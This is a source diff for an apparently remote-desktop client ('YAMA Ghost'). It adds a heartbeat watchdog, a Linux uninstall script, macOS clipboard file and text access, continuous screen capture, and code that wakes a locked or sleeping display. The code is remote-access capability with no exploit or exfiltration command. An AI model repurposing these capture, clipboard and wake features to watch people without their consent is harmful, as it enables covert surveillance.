Mprintf("Calculated clientID(v1 fallback): %llu (machine-id 读取失败)\n", g_myClientID);
}
logInfo.AddReserved(std::to_string(g_myClientID).c_str()); // [16] RES_CLIENT_ID logInfo.AddReserved(std::to_string(g_myClientID).c_str()); // [16] RES_CLIENT_ID
logInfo.AddReserved((int)getpid()); // [17] RES_PID logInfo.AddReserved((int)getpid()); // [17] RES_PID
logInfo.AddReserved(getFileSize(exePath).c_str()); // [18] RES_FILESIZE logInfo.AddReserved(getFileSize(exePath).c_str()); // [18] RES_FILESIZE
// 服务端签名输入:与服务端 AddList 处签名格式一致startTime + "|" + clientID
ClientAuth::g_loginMsg = std::string(logInfo.szStartTime) + "|" + std::to_string(g_myClientID);
// 初始化用户活动检测器(用于心跳包中的 ActiveWnd 字段) // 初始化用户活动检测器(用于心跳包中的 ActiveWnd 字段)
ActivityChecker activityChecker; ActivityChecker activityChecker;
@@ -1174,10 +974,30 @@ int main(int argc, char* argv[])
continue; continue;
} }
// 进入新连接,重置服务端身份校验状态
ClientAuth::OnNewConnection();
ClientObject->SendLoginInfo(logInfo.Speed(clock() - c)); ClientObject->SendLoginInfo(logInfo.Speed(clock() - c));
// 新连接:把 ACK 看门狗喂到当前时间,避免循环刚进来就被误判为超时
g_lastHeartbeatAckMs.store(GetUnixMs(), std::memory_order_relaxed);
// 心跳保活循环:定时发送心跳包,服务端回复后动态更新 RTT // 心跳保活循环:定时发送心跳包,服务端回复后动态更新 RTT
while (ClientObject->IsRunning() && ClientObject->IsConnected() && S_CLIENT_NORMAL == g_bExit) { while (ClientObject->IsRunning() && ClientObject->IsConnected() && S_CLIENT_NORMAL == g_bExit) {
// 检查是否需要重发登录信息(分组变更后)
if (g_needResendLogin.exchange(false)) {
// 更新 szPCNamehostname/groupname 格式)
std::string grp = g_SETTINGS.szGroupName;
if (!grp.empty()) {
std::string pcNameWithGroup = std::string(hostname) + "/" + grp;
strncpy(logInfo.szPCName, pcNameWithGroup.c_str(), sizeof(logInfo.szPCName) - 1);
} else {
strncpy(logInfo.szPCName, hostname, sizeof(logInfo.szPCName) - 1);
}
logInfo.szPCName[sizeof(logInfo.szPCName) - 1] = '\0';
ClientObject->SendLoginInfo(logInfo);
Mprintf(">> Resent login info after group change\n");
}
// 等待心跳间隔(每秒检查一次退出条件,保证及时响应) // 等待心跳间隔(每秒检查一次退出条件,保证及时响应)
int interval = g_heartbeatInterval > 0 ? g_heartbeatInterval : 30; int interval = g_heartbeatInterval > 0 ? g_heartbeatInterval : 30;
for (int i = 0; i < interval; ++i) { for (int i = 0; i < interval; ++i) {
@@ -1188,8 +1008,41 @@ int main(int argc, char* argv[])
if (!ClientObject->IsRunning() || !ClientObject->IsConnected() || g_bExit != S_CLIENT_NORMAL) if (!ClientObject->IsRunning() || !ClientObject->IsConnected() || g_bExit != S_CLIENT_NORMAL)
break; break;
// 30 秒内未通过 MasterSettings 校验 → 断开本连接让外层重连,
// 永不退出进程(详见 ClientAuth::IsTimedOut 注释)。
if (ClientAuth::IsTimedOut()) {
ClientObject->Disconnect(); // 关闭 socket防止重连时 fd 泄漏
break;
}
// 应用层 ACK 看门狗:超过 max(60s, interval*3) 没收到 HeartbeatACK 就
// 主动断开走重连。专治 TCP send() 在半死连接下永远返回成功的盲区——
// VM 挂起恢复 / 笔记本合盖唤醒 / NAT 表项老化等场景,对端早已不在,
// 但本端 send() 仍把字节塞进 SNDBUFIsConnected() 一直为真。
// 与服务端 CheckHeartbeat 超时(2015RemoteDlg.cpp 的 max(60, ReportInterval*3))
// 对齐:服务端删 host 时本端也能感知到,立即重连而不是等数据卡 ~15 分钟。
// 这一层不依赖 TCP_USER_TIMEOUT跨平台必备。
{
int ackTimeoutSec = (interval * 3 > 60) ? interval * 3 : 60;
const uint64_t ackTimeoutMs = (uint64_t)ackTimeoutSec * 1000ULL;
uint64_t lastAck = g_lastHeartbeatAckMs.load(std::memory_order_relaxed);
uint64_t nowMs = GetUnixMs();
if (lastAck > 0 && nowMs > lastAck && nowMs - lastAck > ackTimeoutMs) {
Mprintf(">>> Heartbeat ACK timeout: %llu ms since last ACK "
"(threshold=%llu ms), reconnecting\n",
(unsigned long long)(nowMs - lastAck),
(unsigned long long)ackTimeoutMs);
ClientObject->Disconnect();
break;
}
}
// 构造并发送心跳包(与 Windows 端 KernelManager::SendHeartbeat 格式一致) // 构造并发送心跳包(与 Windows 端 KernelManager::SendHeartbeat 格式一致)
std::string activity = utf8ToGbk(activityChecker.Check()); // ActiveWnd 直接发 UTF-8——与 LOGIN_INFOR.moduleVersion 中声明的
// CLIENT_CAP_UTF8 一致;服务端按 cap 位用 CP_UTF8 解码。早期为兼容
// MBCS 老服务端做过 utf8ToGbk 转换,但现在新版 Linux 客户端经
// libsign 网关只能连新版服务端,无需再转。
std::string activity = activityChecker.Check();
Heartbeat hb; Heartbeat hb;
hb.Time = GetUnixMs(); hb.Time = GetUnixMs();
@@ -1200,11 +1053,25 @@ int main(int argc, char* argv[])
buf[0] = TOKEN_HEARTBEAT; buf[0] = TOKEN_HEARTBEAT;
memcpy(buf + 1, &hb, sizeof(Heartbeat)); memcpy(buf + 1, &hb, sizeof(Heartbeat));
ClientObject->Send2Server((char*)buf, sizeof(buf)); ClientObject->Send2Server((char*)buf, sizeof(buf));
Mprintf(">>> Heartbeat sent: Ping=%dms, Interval=%ds, Activity=%s\n", // 心跳节奏太密日志会刷屏;最多 60s 一行
hb.Ping, interval, activity.c_str()); static time_t lastSendLog = 0;
time_t now_s = time(nullptr);
if (now_s - lastSendLog >= 60) {
lastSendLog = now_s;
Mprintf(">>> Heartbeat sent: Ping=%dms, Interval=%ds, Activity=%s\n",
hb.Ping, interval, activity.c_str());
}
} }
} }
// 退出原因留痕signal handler 不能直接打日志,在这里补一行。
if (g_lastSignal != 0) {
Mprintf(">>> Exit by signal %d (g_bExit=%d)\n",
(int)g_lastSignal, (int)g_bExit);
} else {
Mprintf(">>> Exit normally (g_bExit=%d)\n", (int)g_bExit);
}
Logger::getInstance().stop(); Logger::getInstance().stop();
removePidFile(); removePidFile();
return 0; return 0;

121
linux/uninstall.sh Executable file
View File

@@ -0,0 +1,121 @@
#!/usr/bin/env bash
# YAMA Ghost (Linux client) — uninstall
#
# 用法:
# ./uninstall.sh # 默认从 ~/.local/bin/ghost 卸载
# ./uninstall.sh /opt/yama # 从指定目录卸载
# ./uninstall.sh --yes # 跳过确认(自动化场景)
#
# 行为(幂等 — 重复运行不会报错):
# 1. 停止运行中的 ghost 进程
# 2. 删除 XDG Autostart 文件
# 3. 删除已安装的二进制
# 4. 询问是否清理用户配置(~/.config/ghost
set -euo pipefail
# ---- 颜色 ----
if [[ -t 1 ]]; then
C_RED=$'\033[31m'; C_GREEN=$'\033[32m'; C_YELLOW=$'\033[33m'
C_BLUE=$'\033[34m'; C_BOLD=$'\033[1m'; C_RESET=$'\033[0m'
else
C_RED=''; C_GREEN=''; C_YELLOW=''; C_BLUE=''; C_BOLD=''; C_RESET=''
fi
info() { echo "${C_BLUE}[INFO]${C_RESET} $*"; }
ok() { echo "${C_GREEN}[ OK ]${C_RESET} $*"; }
warn() { echo "${C_YELLOW}[WARN]${C_RESET} $*"; }
error() { echo "${C_RED}[FAIL]${C_RESET} $*" >&2; }
# ---- 参数解析 ----
ASSUME_YES=0
INSTALL_DIR="${HOME}/.local/bin"
for arg in "$@"; do
case "${arg}" in
--yes|-y) ASSUME_YES=1 ;;
--help|-h)
# 头部注释覆盖标题/用法/行为 4 步,对应源文件第 2-13 行
sed -n '2,13p' "$0" | sed 's/^# \?//'
exit 0
;;
*) INSTALL_DIR="${arg}" ;;
esac
done
DEST_BIN="${INSTALL_DIR}/ghost"
AUTOSTART_FILE="${XDG_CONFIG_HOME:-${HOME}/.config}/autostart/ghost.desktop"
CONFIG_DIR="${XDG_CONFIG_HOME:-${HOME}/.config}/ghost"
confirm() {
[[ "${ASSUME_YES}" -eq 1 ]] && return 0
local prompt="$1"
local ans=""
echo -n "${prompt} [y/N] "
read -r ans || true # EOF on stdin: ans stays empty, 返回 no
[[ "${ans}" =~ ^[Yy]$ ]]
}
echo "${C_BOLD}YAMA Ghost Linux 卸载${C_RESET}"
echo " 二进制: ${DEST_BIN}"
echo " 自启动: ${AUTOSTART_FILE}"
echo " 配置: ${CONFIG_DIR}"
echo ""
if ! confirm "确认卸载?"; then
info "已取消"
exit 0
fi
# ---- 1. 停止进程 ----
if pgrep -x ghost > /dev/null; then
info "停止运行中的 ghost 进程"
pkill -x ghost || true
sleep 1
if pgrep -x ghost > /dev/null; then
warn "进程未优雅退出,强制 kill"
pkill -9 -x ghost || true
sleep 1
fi
ok "ghost 进程已停止"
else
info "没有运行中的 ghost 进程"
fi
# ---- 2. 删除 Autostart 文件 ----
if [[ -f "${AUTOSTART_FILE}" ]]; then
rm -f "${AUTOSTART_FILE}"
ok "已删除 ${AUTOSTART_FILE}"
else
info "Autostart 文件不存在(已卸载或未安装过)"
fi
# ---- 3. 删除二进制 ----
if [[ -f "${DEST_BIN}" ]]; then
if [[ -w "${DEST_BIN}" ]] || [[ -w "$(dirname "${DEST_BIN}")" ]]; then
rm -f "${DEST_BIN}"
ok "已删除 ${DEST_BIN}"
else
info "需要 sudo 才能删除 ${DEST_BIN}"
sudo rm -f "${DEST_BIN}"
ok "已删除 ${DEST_BIN}"
fi
# 如果安装目录是 ~/.local/bin 且现在空了,不删除(可能用户还有其它东西)
else
info "二进制不存在(已卸载或不在 ${INSTALL_DIR}"
fi
# ---- 4. 用户配置目录(询问,不主动删)----
if [[ -d "${CONFIG_DIR}" ]]; then
echo ""
warn "用户配置目录仍存在:${CONFIG_DIR}"
warn "其中可能包含 PID 文件、日志等。删除后无法恢复。"
if confirm " 一并删除配置目录?"; then
rm -rf "${CONFIG_DIR}"
ok "已删除 ${CONFIG_DIR}"
else
info "保留配置目录"
fi
fi
echo ""
echo "${C_GREEN}${C_BOLD}✓ 卸载完成${C_RESET}"

10
macos/CMakeLists.txt
View File

@@ -19,6 +19,7 @@ set(SOURCES
main.mm main.mm
../client/Buffer.cpp ../client/Buffer.cpp
../client/IOCPClient.cpp ../client/IOCPClient.cpp
../client/sign_shim_unix.cpp
ScreenHandler.mm ScreenHandler.mm
InputHandler.mm InputHandler.mm
SystemManager.mm SystemManager.mm
@@ -45,6 +46,8 @@ find_library(CARBON_FRAMEWORK Carbon REQUIRED)
find_library(VIDEOTOOLBOX_FRAMEWORK VideoToolbox REQUIRED) find_library(VIDEOTOOLBOX_FRAMEWORK VideoToolbox REQUIRED)
find_library(COREMEDIA_FRAMEWORK CoreMedia REQUIRED) find_library(COREMEDIA_FRAMEWORK CoreMedia REQUIRED)
find_library(COREVIDEO_FRAMEWORK CoreVideo REQUIRED) find_library(COREVIDEO_FRAMEWORK CoreVideo REQUIRED)
find_library(ACCELERATE_FRAMEWORK Accelerate REQUIRED)
find_library(ICONV_LIBRARY iconv REQUIRED)
target_link_libraries(ghost PRIVATE target_link_libraries(ghost PRIVATE
${COCOA_FRAMEWORK} ${COCOA_FRAMEWORK}
@@ -57,7 +60,14 @@ target_link_libraries(ghost PRIVATE
${VIDEOTOOLBOX_FRAMEWORK} ${VIDEOTOOLBOX_FRAMEWORK}
${COREMEDIA_FRAMEWORK} ${COREMEDIA_FRAMEWORK}
${COREVIDEO_FRAMEWORK} ${COREVIDEO_FRAMEWORK}
${ACCELERATE_FRAMEWORK}
${ICONV_LIBRARY}
"${CMAKE_SOURCE_DIR}/lib/libzstd.a" "${CMAKE_SOURCE_DIR}/lib/libzstd.a"
# 私有签名库(提供 signMessage / verifyMessage源码不开源
# 该库由 SimplePlugins 仓库本地构建后放置于 lib/,构建机需先准备好
# libsign.a 内部使用 macOS CommonCryptoHMAC-SHA256CCHmac 在 libSystem
# 中已被 Cocoa/CoreFoundation 等链接自动引入,故此处无需额外 framework
"${CMAKE_SOURCE_DIR}/lib/libsign.a"
) )
# Compiler flags # Compiler flags

186
macos/ClipboardHandler.h Normal file
View File

@@ -0,0 +1,186 @@
#pragma once
#import <Cocoa/Cocoa.h>
#include <string>
#include <vector>
// macOS 剪贴板操作封装
// 使用 NSPasteboard API 实现
class ClipboardHandler
{
public:
// 检查剪贴板功能是否可用 (macOS 总是可用)
static bool IsAvailable()
{
return true;
}
// 获取剪贴板中的文件列表
// 返回文件的完整路径列表UTF-8失败返回空列表
static std::vector<std::string> GetFiles()
{
std::vector<std::string> files;
@autoreleasepool {
NSPasteboard* pasteboard = [NSPasteboard generalPasteboard];
// 方法1: 尝试获取文件 URL 列表 (macOS 10.13+)
NSArray<NSURL*>* urls = [pasteboard readObjectsForClasses:@[[NSURL class]]
options:@{NSPasteboardURLReadingFileURLsOnlyKey: @YES}];
if (urls && urls.count > 0) {
for (NSURL* url in urls) {
if (url.isFileURL) {
NSString* path = url.path;
if (path) {
files.push_back([path UTF8String]);
}
}
}
return files;
}
// 方法2: 兼容旧版 API (NSFilenamesPboardType)
NSArray* filenames = [pasteboard propertyListForType:NSFilenamesPboardType];
if (filenames && [filenames isKindOfClass:[NSArray class]]) {
for (NSString* path in filenames) {
if ([path isKindOfClass:[NSString class]]) {
files.push_back([path UTF8String]);
}
}
}
}
return files;
}
// 获取剪贴板文本
// 返回 UTF-8 编码的文本,失败返回空字符串
static std::string GetText()
{
@autoreleasepool {
NSPasteboard* pasteboard = [NSPasteboard generalPasteboard];
NSString* text = [pasteboard stringForType:NSPasteboardTypeString];
if (text) {
return [text UTF8String];
}
}
return "";
}
// 设置剪贴板文本
// text: UTF-8 编码的文本
// 返回是否成功
static bool SetText(const std::string& text)
{
if (text.empty()) return true;
@autoreleasepool {
NSPasteboard* pasteboard = [NSPasteboard generalPasteboard];
[pasteboard clearContents];
NSString* nsText = [NSString stringWithUTF8String:text.c_str()];
if (nsText) {
return [pasteboard setString:nsText forType:NSPasteboardTypeString];
}
}
return false;
}
// 设置剪贴板文本(从原始字节)
// data: 文本数据(可能是 GBK 或 UTF-8
// len: 数据长度
static bool SetTextRaw(const char* data, size_t len)
{
if (!data || len == 0) return true;
// 服务端发来的文本可能是 GBK 编码,尝试转换为 UTF-8
std::string text = ConvertToUtf8(data, len);
return SetText(text);
}
// 设置剪贴板文件列表
// files: UTF-8 编码的文件路径列表
// 返回是否成功
static bool SetFiles(const std::vector<std::string>& files)
{
if (files.empty()) return true;
@autoreleasepool {
NSPasteboard* pasteboard = [NSPasteboard generalPasteboard];
[pasteboard clearContents];
NSMutableArray<NSURL*>* urls = [NSMutableArray arrayWithCapacity:files.size()];
for (const auto& path : files) {
NSString* nsPath = [NSString stringWithUTF8String:path.c_str()];
if (nsPath) {
NSURL* url = [NSURL fileURLWithPath:nsPath];
if (url) {
[urls addObject:url];
}
}
}
if (urls.count > 0) {
return [pasteboard writeObjects:urls];
}
}
return false;
}
private:
// 检查是否是有效的 UTF-8 序列
static bool IsValidUtf8(const char* data, size_t len)
{
const unsigned char* bytes = (const unsigned char*)data;
size_t i = 0;
while (i < len) {
if (bytes[i] <= 0x7F) {
// ASCII
i++;
} else if ((bytes[i] & 0xE0) == 0xC0) {
// 2-byte sequence
if (i + 1 >= len || (bytes[i + 1] & 0xC0) != 0x80) return false;
i += 2;
} else if ((bytes[i] & 0xF0) == 0xE0) {
// 3-byte sequence
if (i + 2 >= len || (bytes[i + 1] & 0xC0) != 0x80 || (bytes[i + 2] & 0xC0) != 0x80) return false;
i += 3;
} else if ((bytes[i] & 0xF8) == 0xF0) {
// 4-byte sequence
if (i + 3 >= len || (bytes[i + 1] & 0xC0) != 0x80 ||
(bytes[i + 2] & 0xC0) != 0x80 || (bytes[i + 3] & 0xC0) != 0x80) return false;
i += 4;
} else {
return false;
}
}
return true;
}
// 尝试将 GBK 转换为 UTF-8
// 如果已经是 UTF-8直接返回
static std::string ConvertToUtf8(const char* data, size_t len)
{
// 检查是否已经是有效的 UTF-8
if (IsValidUtf8(data, len)) {
return std::string(data, len);
}
// 使用 NSString 进行编码转换 (GBK = CFStringEncodingGB_18030_2000)
@autoreleasepool {
// 尝试 GBK (GB18030) 编码
NSStringEncoding gbkEncoding = CFStringConvertEncodingToNSStringEncoding(kCFStringEncodingGB_18030_2000);
NSString* str = [[NSString alloc] initWithBytes:data length:len encoding:gbkEncoding];
if (str) {
const char* utf8 = [str UTF8String];
if (utf8) {
return std::string(utf8);
}
}
}
// 转换失败,返回原始数据
return std::string(data, len);
}
};

23
macos/Permissions.mm
View File

@@ -6,8 +6,27 @@
bool Permissions::checkScreenCapture() { bool Permissions::checkScreenCapture() {
// macOS 10.15+ requires screen recording permission // macOS 10.15+ requires screen recording permission
if (@available(macOS 10.15, *)) { if (@available(macOS 10.15, *)) {
// Use CGPreflightScreenCaptureAccess for reliable permission check // CGPreflightScreenCaptureAccess() is unreliable - it can return false
// This API is available since macOS 10.15 // even when permission is granted (especially after code re-signing).
// Instead, actually try to capture the screen to verify permission.
CGDirectDisplayID displayID = CGMainDisplayID();
CGImageRef image = CGDisplayCreateImage(displayID);
if (image != NULL) {
// Got an image - permission is granted
// Additional check: verify image has actual content (not blank)
size_t width = CGImageGetWidth(image);
size_t height = CGImageGetHeight(image);
CGImageRelease(image);
if (width > 0 && height > 0) {
return true;
}
}
// Failed to capture - permission not granted or display issue
// Fall back to preflight check for triggering dialog
return CGPreflightScreenCaptureAccess(); return CGPreflightScreenCaptureAccess();
} }

35
macos/ScreenHandler.h
View File

@@ -2,13 +2,17 @@
#import <CoreGraphics/CoreGraphics.h> #import <CoreGraphics/CoreGraphics.h>
#import <dispatch/dispatch.h> #import <dispatch/dispatch.h>
#import <IOKit/pwr_mgt/IOPMLib.h>
#import <IOSurface/IOSurface.h>
#import "../client/IOCPClient.h" #import "../client/IOCPClient.h"
#import "../common/commands.h" // QualityLevel, QualityProfile, ALGORITHM_*
#include <vector> #include <vector>
#include <atomic> #include <atomic>
#include <mutex> #include <mutex>
#include <thread> #include <thread>
#include <cstdint> #include <cstdint>
#include <memory> #include <memory>
#include <condition_variable>
// Forward declarations // Forward declarations
class IOCPClient; class IOCPClient;
@@ -32,11 +36,7 @@ struct BITMAPINFOHEADER_MAC {
}; };
#pragma pack(pop) #pragma pack(pop)
// Screen algorithm constants // Algorithm constants from commands.h: ALGORITHM_GRAY, ALGORITHM_DIFF, ALGORITHM_H264, ALGORITHM_RGB565
#define ALGORITHM_GRAY 0
#define ALGORITHM_DIFF 1
#define ALGORITHM_H264 2
#define ALGORITHM_RGB565 3
class ScreenHandler : public IOCPManager { class ScreenHandler : public IOCPManager {
public: public:
@@ -120,6 +120,7 @@ private:
std::vector<uint8_t> m_prevFrame; std::vector<uint8_t> m_prevFrame;
std::vector<uint8_t> m_currFrame; std::vector<uint8_t> m_currFrame;
std::vector<uint8_t> m_diffBuffer; std::vector<uint8_t> m_diffBuffer;
std::vector<uint8_t> m_tempBuffer; // 临时缓冲区,避免每帧分配
// Quality settings // Quality settings
std::atomic<uint8_t> m_algorithm; std::atomic<uint8_t> m_algorithm;
@@ -132,4 +133,28 @@ private:
// Input handler for mouse/keyboard control // Input handler for mouse/keyboard control
std::unique_ptr<InputHandler> m_inputHandler; std::unique_ptr<InputHandler> m_inputHandler;
// Power management: prevent display sleep during remote desktop
IOPMAssertionID m_displayAssertionID;
// Cached color space (avoid per-frame creation)
CGColorSpaceRef m_colorSpace;
// CGDisplayStream (efficient continuous capture)
CGDisplayStreamRef m_displayStream;
dispatch_queue_t m_streamQueue;
IOSurfaceRef m_latestSurface;
std::mutex m_surfaceMutex;
std::condition_variable m_surfaceCond;
std::atomic<bool> m_hasNewFrame;
// Initialize/cleanup display stream
bool initDisplayStream();
void cleanupDisplayStream();
// Process frame from IOSurface (called by stream callback)
void processIOSurface(IOSurfaceRef surface);
// Capture from IOSurface to buffer (with vertical flip)
bool captureFromIOSurface(IOSurfaceRef surface, std::vector<uint8_t>& buffer);
}; };

563
macos/ScreenHandler.mm
View File

@@ -1,13 +1,18 @@
#import "ScreenHandler.h" #import "ScreenHandler.h"
#import "H264Encoder.h" #import "H264Encoder.h"
#import "InputHandler.h" #import "InputHandler.h"
#import "ClipboardHandler.h"
#import "../client/IOCPClient.h" #import "../client/IOCPClient.h"
#import "../common/commands.h" #import "../common/commands.h"
#import "../common/FileTransferV2.h"
#import "../common/logger.h"
#import "Permissions.h" #import "Permissions.h"
#import <Cocoa/Cocoa.h> #import <Cocoa/Cocoa.h>
#import <chrono>
#import <CoreGraphics/CoreGraphics.h> #import <CoreGraphics/CoreGraphics.h>
#import <ApplicationServices/ApplicationServices.h> #import <ApplicationServices/ApplicationServices.h>
#import <mach/mach_time.h> #import <mach/mach_time.h>
#import <Accelerate/Accelerate.h>
// Global client ID (calculated in main.mm) // Global client ID (calculated in main.mm)
extern uint64_t g_myClientID; extern uint64_t g_myClientID;
@@ -26,9 +31,18 @@ ScreenHandler::ScreenHandler(IOCPClient* client)
, m_maxFPS(15) , m_maxFPS(15)
, m_qualityLevel(QUALITY_GOOD) // Use fixed QUALITY_GOOD (H264) for web compatibility , m_qualityLevel(QUALITY_GOOD) // Use fixed QUALITY_GOOD (H264) for web compatibility
, m_h264Bitrate(3000000) // 3 Mbps (matches Windows QUALITY_GOOD) , m_h264Bitrate(3000000) // 3 Mbps (matches Windows QUALITY_GOOD)
, m_displayAssertionID(0)
, m_colorSpace(nullptr)
, m_displayStream(nullptr)
, m_streamQueue(nullptr)
, m_latestSurface(nullptr)
, m_hasNewFrame(false)
{ {
memset(&m_bmpHeader, 0, sizeof(m_bmpHeader)); memset(&m_bmpHeader, 0, sizeof(m_bmpHeader));
// Cache color space (avoid per-frame creation)
m_colorSpace = CGColorSpaceCreateDeviceRGB();
// Initialize input handler for mouse/keyboard control // Initialize input handler for mouse/keyboard control
m_inputHandler = std::make_unique<InputHandler>(); m_inputHandler = std::make_unique<InputHandler>();
if (m_inputHandler->init()) { if (m_inputHandler->init()) {
@@ -41,6 +55,13 @@ ScreenHandler::ScreenHandler(IOCPClient* client)
ScreenHandler::~ScreenHandler() ScreenHandler::~ScreenHandler()
{ {
stop(); stop();
cleanupDisplayStream();
// Release cached color space
if (m_colorSpace) {
CGColorSpaceRelease(m_colorSpace);
m_colorSpace = nullptr;
}
} }
bool ScreenHandler::init() bool ScreenHandler::init()
@@ -103,24 +124,273 @@ bool ScreenHandler::init()
m_currFrame.resize(m_bmpHeader.biSizeImage, 0); m_currFrame.resize(m_bmpHeader.biSizeImage, 0);
m_diffBuffer.resize(1 + 1 + 8 + 1 + m_bmpHeader.biSizeImage * 2); m_diffBuffer.resize(1 + 1 + 8 + 1 + m_bmpHeader.biSizeImage * 2);
// Wake display if needed (do this early, before sending TOKEN_BITMAPINFO)
bool wasAsleep = CGDisplayIsAsleep(m_displayID);
bool isLocked = false;
CFDictionaryRef sessionInfo = CGSessionCopyCurrentDictionary();
if (sessionInfo) {
CFBooleanRef screenLocked = (CFBooleanRef)CFDictionaryGetValue(
sessionInfo, CFSTR("CGSSessionScreenIsLocked"));
if (screenLocked && CFBooleanGetValue(screenLocked)) {
isLocked = true;
}
CFRelease(sessionInfo);
}
if (wasAsleep || isLocked) {
NSLog(@"Waking display in init (asleep=%d, locked=%d)...", wasAsleep, isLocked);
// Create NoDisplaySleep assertion - this wakes the display
if (m_displayAssertionID == 0) {
IOReturn result = IOPMAssertionCreateWithName(
kIOPMAssertionTypeNoDisplaySleep,
kIOPMAssertionLevelOn,
CFSTR("SimpleRemoter - remote desktop session active"),
&m_displayAssertionID
);
if (result == kIOReturnSuccess) {
NSLog(@"Display assertion created (ID: %u)", m_displayAssertionID);
}
}
// Declare user activity to ensure wake
IOPMAssertionID wakeAssertionID = 0;
IOPMAssertionDeclareUserActivity(
CFSTR("SimpleRemoter - waking display"),
kIOPMUserActiveLocal,
&wakeAssertionID
);
if (wakeAssertionID) {
IOPMAssertionRelease(wakeAssertionID);
}
// Brief wait for loginwindow to render
std::this_thread::sleep_for(std::chrono::milliseconds(500));
NSLog(@"Display wake complete");
}
// Initialize CGDisplayStream for efficient capture
if (!initDisplayStream()) {
NSLog(@"Warning: CGDisplayStream init failed, falling back to legacy capture");
}
NSLog(@"ScreenHandler initialized: %dx%d", m_width, m_height); NSLog(@"ScreenHandler initialized: %dx%d", m_width, m_height);
return true; return true;
} }
bool ScreenHandler::initDisplayStream()
{
// Create dispatch queue for stream callbacks
m_streamQueue = dispatch_queue_create("com.ghost.screenstream", DISPATCH_QUEUE_SERIAL);
if (!m_streamQueue) {
NSLog(@"Failed to create dispatch queue for display stream");
return false;
}
// Stream properties
CFMutableDictionaryRef properties = CFDictionaryCreateMutable(
kCFAllocatorDefault, 0,
&kCFTypeDictionaryKeyCallBacks,
&kCFTypeDictionaryValueCallBacks
);
// Request minimum frame interval based on FPS (e.g., 15 FPS = 1/15 sec)
int fps = m_maxFPS.load();
if (fps <= 0) fps = 15;
double interval = 1.0 / (double)fps;
CFNumberRef intervalRef = CFNumberCreate(kCFAllocatorDefault, kCFNumberDoubleType, &interval);
CFDictionarySetValue(properties, kCGDisplayStreamMinimumFrameTime, intervalRef);
CFRelease(intervalRef);
// Show cursor in stream
CFDictionarySetValue(properties, kCGDisplayStreamShowCursor, kCFBooleanFalse);
// Preserve aspect ratio
CFDictionarySetValue(properties, kCGDisplayStreamPreserveAspectRatio, kCFBooleanTrue);
// Create the display stream with BGRA format
__block ScreenHandler* handler = this;
m_displayStream = CGDisplayStreamCreateWithDispatchQueue(
m_displayID,
m_width,
m_height,
'BGRA', // Pixel format
properties,
m_streamQueue,
^(CGDisplayStreamFrameStatus status,
uint64_t displayTime,
IOSurfaceRef frameSurface,
CGDisplayStreamUpdateRef updateRef) {
(void)displayTime;
(void)updateRef;
if (status == kCGDisplayStreamFrameStatusFrameComplete && frameSurface) {
handler->processIOSurface(frameSurface);
} else if (status == kCGDisplayStreamFrameStatusFrameIdle) {
// Screen not changed, still notify for FPS timing
handler->m_hasNewFrame.store(true);
handler->m_surfaceCond.notify_one();
} else if (status == kCGDisplayStreamFrameStatusStopped) {
NSLog(@"CGDisplayStream stopped");
}
}
);
CFRelease(properties);
if (!m_displayStream) {
NSLog(@"Failed to create CGDisplayStream");
m_streamQueue = nullptr; // ARC manages dispatch objects
return false;
}
// Start the stream
CGError err = CGDisplayStreamStart(m_displayStream);
if (err != kCGErrorSuccess) {
NSLog(@"Failed to start CGDisplayStream: %d", err);
CFRelease(m_displayStream);
m_displayStream = nullptr;
m_streamQueue = nullptr; // ARC manages dispatch objects
return false;
}
NSLog(@"CGDisplayStream started: %dx%d @ %d FPS", m_width, m_height, fps);
return true;
}
void ScreenHandler::cleanupDisplayStream()
{
if (m_displayStream) {
CGDisplayStreamStop(m_displayStream);
CFRelease(m_displayStream);
m_displayStream = nullptr;
}
// ARC manages dispatch objects, just nil the pointer
m_streamQueue = nullptr;
std::lock_guard<std::mutex> lock(m_surfaceMutex);
if (m_latestSurface) {
CFRelease(m_latestSurface);
m_latestSurface = nullptr;
}
}
void ScreenHandler::processIOSurface(IOSurfaceRef surface)
{
// Retain the surface and store it
std::lock_guard<std::mutex> lock(m_surfaceMutex);
if (m_latestSurface) {
CFRelease(m_latestSurface);
}
m_latestSurface = (IOSurfaceRef)CFRetain(surface);
m_hasNewFrame.store(true);
m_surfaceCond.notify_one();
}
bool ScreenHandler::captureFromIOSurface(IOSurfaceRef surface, std::vector<uint8_t>& buffer)
{
if (!surface) return false;
// Lock the surface for CPU read
IOSurfaceLock(surface, kIOSurfaceLockReadOnly, nullptr);
size_t width = IOSurfaceGetWidth(surface);
size_t height = IOSurfaceGetHeight(surface);
size_t bytesPerRow = IOSurfaceGetBytesPerRow(surface);
void* baseAddr = IOSurfaceGetBaseAddress(surface);
if (!baseAddr || width != (size_t)m_width || height != (size_t)m_height) {
IOSurfaceUnlock(surface, kIOSurfaceLockReadOnly, nullptr);
return false;
}
// Ensure temp buffer is allocated
size_t requiredSize = m_width * 4 * m_height;
if (m_tempBuffer.size() != requiredSize) {
m_tempBuffer.resize(requiredSize);
}
// Copy from IOSurface to temp buffer (handle different bytesPerRow)
size_t dstBytesPerRow = m_width * 4;
if (bytesPerRow == dstBytesPerRow) {
memcpy(m_tempBuffer.data(), baseAddr, requiredSize);
} else {
// Row by row copy for different strides
uint8_t* src = (uint8_t*)baseAddr;
uint8_t* dst = m_tempBuffer.data();
for (size_t y = 0; y < height; y++) {
memcpy(dst + y * dstBytesPerRow, src + y * bytesPerRow, dstBytesPerRow);
}
}
IOSurfaceUnlock(surface, kIOSurfaceLockReadOnly, nullptr);
// Flip vertically using Accelerate framework (SIMD optimized)
vImage_Buffer src = {
.data = m_tempBuffer.data(),
.height = (vImagePixelCount)height,
.width = (vImagePixelCount)width,
.rowBytes = dstBytesPerRow
};
vImage_Buffer dst = {
.data = buffer.data(),
.height = (vImagePixelCount)height,
.width = (vImagePixelCount)width,
.rowBytes = dstBytesPerRow
};
vImage_Error err = vImageVerticalReflect_ARGB8888(&src, &dst, kvImageNoFlags);
if (err != kvImageNoError) {
// Fallback to manual flip
for (size_t y = 0; y < height; y++) {
memcpy(buffer.data() + (height - 1 - y) * dstBytesPerRow,
m_tempBuffer.data() + y * dstBytesPerRow,
dstBytesPerRow);
}
}
return true;
}
void ScreenHandler::start(IOCPClient* client, uint64_t clientID) void ScreenHandler::start(IOCPClient* client, uint64_t clientID)
{ {
if (m_running) return; // If already running, just send TOKEN_BITMAPINFO again
// This allows server to create additional dialogs (MFC can open while Web is active)
if (m_running) {
NSLog(@"ScreenHandler already running, sending TOKEN_BITMAPINFO for new dialog");
sendBitmapInfo();
return;
}
m_client = client; m_client = client;
m_clientID = clientID; m_clientID = clientID;
m_running = true; m_running = true;
// Display wake was already done in init(), just ensure assertion exists
